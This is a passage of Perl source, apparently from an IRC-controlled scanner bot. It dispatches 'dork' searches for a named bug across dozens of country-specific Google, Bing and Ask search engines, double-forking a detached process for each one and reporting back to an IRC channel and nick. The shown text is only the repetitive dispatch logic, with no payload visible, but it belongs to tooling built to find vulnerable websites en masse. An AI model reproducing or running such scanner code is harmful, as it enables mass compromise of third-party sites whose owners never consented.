(my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNZ",$type,$nick); } exit; } } if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIE",$type,$nick); } exit; } } if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBR",$type,$nick); } exit; } } if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAR",$type,$nick); } exit; } } if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCO",$type,$nick); } exit; } } if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCU",$type,$nick); } exit; } } if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCL",$type,$nick); } exit; } } if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMX",$type,$nick); } exit; } } if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAU",$type,$nick); } exit; } } if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRU",$type,$nick); } exit; } } if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAT",$type,$nick); } exit; } } if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePL",$type,$nick); } exit; } } if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIL",$type,$nick); } exit; } } if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTR",$type,$nick); } exit; } } if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUA",$type,$nick); } exit; } } if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeGR",$type,$nick); } exit; } } if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeJP",$type,$nick); } exit; } } if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCN",$type,$nick); } exit; } } if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMY",$type,$nick); } exit; } } if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTH",$type,$nick); } exit; } } if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIN",$type,$nick); } exit; } } if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKR",$type,$nick); } exit; } } if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRO",$type,$nick); } exit; } } if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTW",$type,$nick); } exit; } } if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeZA",$type,$nick); } exit; } } if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePT",$type,$nick); } exit; } } if ($engine =~ /googleCZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePT",$type,$nick); } exit; } } if ($engine =~ /googleEU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeEU",$type,$nick); } exit; } } if ($engine =~ /googleHU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeHU",$type,$nick); } exit; } } if ($engine =~ /googleID/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeID",$type,$nick); } exit; } } if ($engine =~ /googlePH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePH",$type,$nick); } exit; } } if ($engine =~ /googleSI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSI",$type,$nick); } exit; } } if ($engine =~ /googleCAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCAT",$type,$nick); } exit; } } if ($engine =~ /googleBO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBO",$type,$nick); } exit; } } if ($engine =~ /googleBA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBA",$type,$nick); } exit; } } if ($engine =~ /googleCR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCR",$type,$nick); } exit; } } if ($engine =~ /googleHR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeHR",$type,$nick); } exit; } } if ($engine =~ /googleEC/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeEC",$type,$nick); } exit; } } if ($engine =~ /googleFI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeFI",$type,$nick); } exit; } } if ($engine =~ /googleHN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeHN",$type,$nick); } exit; } } if ($engine =~ /googleHK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeHK",$type,$nick); } exit; } } if ($engine =~ /googleIS/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIS",$type,$nick); } exit; } } if ($engine =~ /googleKZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKZ",$type,$nick); } exit; } } if ($engine =~ /googleKE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKE",$type,$nick); } exit; } } if ($engine =~ /googleLV/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeLV",$type,$nick); } exit; } } if ($engine =~ /googleLT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeLT",$type,$nick); } exit; } } if ($engine =~ /googleLU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeLU",$type,$nick); } exit; } } if ($engine =~ /googleMW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMW",$type,$nick); } exit; } } if ($engine =~ /googleMT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMT",$type,$nick); } exit; } } if ($engine =~ /googleMA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMA",$type,$nick); } exit; } } if ($engine =~ /googleNP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNP",$type,$nick); } exit; } } if ($engine =~ /googlePK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePK",$type,$nick); } exit; } } if ($engine =~ /googlePR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePR",$type,$nick); } exit; } } if ($engine =~ /googleSA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSA",$type,$nick); } exit; } } if ($engine =~ /googleSN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSN",$type,$nick); } exit; } } if ($engine =~ /googleSG/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSG",$type,$nick); } exit; } } if ($engine =~ /googleSK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSK",$type,$nick); } exit; } } if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCH",$type,$nick); } exit; } } if ($engine =~ /googleVE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeVE",$type,$nick); } exit; } } if ($engine =~ /googleVN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeVN",$type,$nick); } exit; } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLe",$type,$nick); } exit; } } if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDE",$type,$nick); } exit; } } if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUK",$type,$nick); } exit; } } if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCA",$type,$nick); } exit; } } if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBR",$type,$nick); } exit; } } if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingFR",$type,$nick); } exit; } } if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingES",$type,$nick); } exit; } } if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIT",$type,$nick); } exit; } } if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBE",$type,$nick); } exit; } } if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNL",$type,$nick); } exit; } } if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPT",$type,$nick); } exit; } } if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNO",$type,$nick); } exit; } } if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDK",$type,$nick); } exit; } } if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSE",$type,$nick); } exit; } } if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCH",$type,$nick); } exit; } } if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNZ",$type,$nick); } exit; } } if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingRU",$type,$nick); } exit; } } if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingJP",$type,$nick); } exit; } } if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCN",$type,$nick); } exit; } } if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKR",$type,$nick); } exit; } } if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMX",$type,$nick); } exit; } } if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAR",$type,$nick); } exit; } } if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCL",$type,$nick); } exit; } } if ($engine =~ /bingAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAU",$type,$nick); } exit; } } if ($engine =~ /bingAE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAE",$type,$nick); } exit; } } if ($engine =~ /bingAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAT",$type,$nick); } exit; } } if ($engine =~ /bingCZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCZ",$type,$nick); } exit; } } if ($engine =~ /bingEU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingEU",$type,$nick); } exit; } } if ($engine =~ /bingHU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingHU",$type,$nick); } exit; } } if ($engine =~ /bingID/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingID",$type,$nick); } exit; } } if ($engine =~ /bingIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIL",$type,$nick); } exit; } } if ($engine =~ /bingIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIN",$type,$nick); } exit; } } if ($engine =~ /bingINFO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingINFO",$type,$nick); } exit; } } if ($engine =~ /bingIR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIR",$type,$nick); } exit; } } if ($engine =~ /bingMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMY",$type,$nick); } exit; } } if ($engine =~ /bingNET/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNET",$type,$nick); } exit; } } if ($engine =~ /bingORG/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingORG",$type,$nick); } exit; } } if ($engine =~ /bingPH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPH",$type,$nick); } exit; } } if ($engine =~ /bingPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPL",$type,$nick); } exit; } } if ($engine =~ /bingRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingRO",$type,$nick); } exit; } } if ($engine =~ /bingTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingTH",$type,$nick); } exit; } } if ($engine =~ /bingUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUA",$type,$nick); } exit; } } if ($engine =~ /bingUS/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUS",$type,$nick); } exit; } } if ($engine =~ /bingSI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSI",$type,$nick); } exit; } } if ($engine =~ /bingBIZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBIZ",$type,$nick); } exit; } } if ($engine =~ /bingXXX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingXXX",$type,$nick); } exit; } } if ($engine =~ /bingTV/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingTV",$type,$nick); } exit; } } if ($engine =~ /bingCC/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCC",$type,$nick); } exit; } } if ($engine =~ /bingMIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMIL",$type,$nick); } exit; } } if ($engine =~ /bingASIA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingASIA",$type,$nick); } exit; } } if ($engine =~ /bingNAME/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNAME",$type,$nick); } exit; } } if ($engine =~ /bingPRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPRO",$type,$nick); } exit; } } if ($engine =~ /bingTRAVEL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingTRAVEL",$type,$nick); } exit; } } if ($engine =~ /bingJOBS/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingJOBS",$type,$nick); } exit; } } if ($engine =~ /bingMOBI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMOBI",$type,$nick); } exit; } } if ($engine =~ /bingAERO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAERO",$type,$nick); } exit; } } if ($engine =~ /bingCAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCAT",$type,$nick); } exit; } } if ($engine =~ /bingCOOP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCOOP",$type,$nick); } exit; } } if ($engine =~ /bingEDU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingEDU",$type,$nick); } exit; } } if ($engine =~ /bingGOV/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingGOV",$type,$nick); } exit; } } if ($engine =~ /bingBO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBO",$type,$nick); } exit; } } if ($engine =~ /bingBA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBA",$type,$nick); } exit; } } if ($engine =~ /bingBW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBW",$type,$nick); } exit; } } if ($engine =~ /bingBG/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBG",$type,$nick); } exit; } } if ($engine =~ /bingCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCO",$type,$nick); } exit; } } if ($engine =~ /bingCR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCR",$type,$nick); } exit; } } if ($engine =~ /bingHR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingHR",$type,$nick); } exit; } } if ($engine =~ /bingDO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDO",$type,$nick); } exit; } } if ($engine =~ /bingEC/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingEC",$type,$nick); } exit; } } if ($engine =~ /bingGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingGR",$type,$nick); } exit; } } if ($engine =~ /bingHN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingHN",$type,$nick); } exit; } } if ($engine =~ /bingHK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingHK",$type,$nick); } exit; } } if ($engine =~ /bingIS/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIS",$type,$nick); } exit; } } if ($engine =~ /bingIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIE",$type,$nick); } exit; } } if ($engine =~ /bingKZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKZ",$type,$nick); } exit; } } if ($engine =~ /bingKE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKE",$type,$nick); } exit; } } if ($engine =~ /bingKG/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKG",$type,$nick); } exit; } } if ($engine =~ /bingLV/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingLV",$type,$nick); } exit; } } if ($engine =~ /bingLY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingLY",$type,$nick); } exit; } } if ($engine =~ /bingLT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingLT",$type,$nick); } exit; } } if ($engine =~ /bingLU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingLU",$type,$nick); } exit; } } if ($engine =~ /bingMA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMA",$type,$nick); } exit; } } if ($engine =~ /bingNP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNP",$type,$nick); } exit; } } if ($engine =~ /bingPK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPK",$type,$nick); } exit; } } if ($engine =~ /bingPR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPR",$type,$nick); } exit; } } if ($engine =~ /bingSG/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSG",$type,$nick); } exit; } } if ($engine =~ /bingSK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSK",$type,$nick); } exit; } } if ($engine =~ /bingZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingZA",$type,$nick); } exit; } } if ($engine =~ /bingLK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingLK",$type,$nick); } exit; } } if ($engine =~ /bingTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingTW",$type,$nick); } exit; } } if ($engine =~ /bingTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingTR",$type,$nick); } exit; } } if ($engine =~ /bingVE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingVE",$type,$nick); } exit; } } if ($engine =~ /bingVN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingVN",$type,$nick); } exit; } } if ($engine =~ /bingMUSEUM/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMUSEUM",$type,$nick); } exit; } } if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKCA",$type,$nick); } exit; } } if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDE",$type,$nick); } exit; } } if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKIT",$type,$nick); } exit; } } if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKFR",$type,$nick); } exit; } } if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKES",$type,$nick); } exit; } } if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKRU",$type,$nick); } exit; } } if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNL",$type,$nick); } exit; } } if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKUK",$type,$nick); } exit; } } if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKBR",$type,$nick); } exit; } } if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKPL",$type,$nick); } exit; } } if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAU",$type,$nick); } exit; } } if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAT",$type,$nick); } exit; } } if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKJP",$type,$nick); } exit; } } if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKSE",$type,$nick); } exit; } } if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKMX",$type,$nick); } exit; } } if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNO",$type,$nick); } exit; } 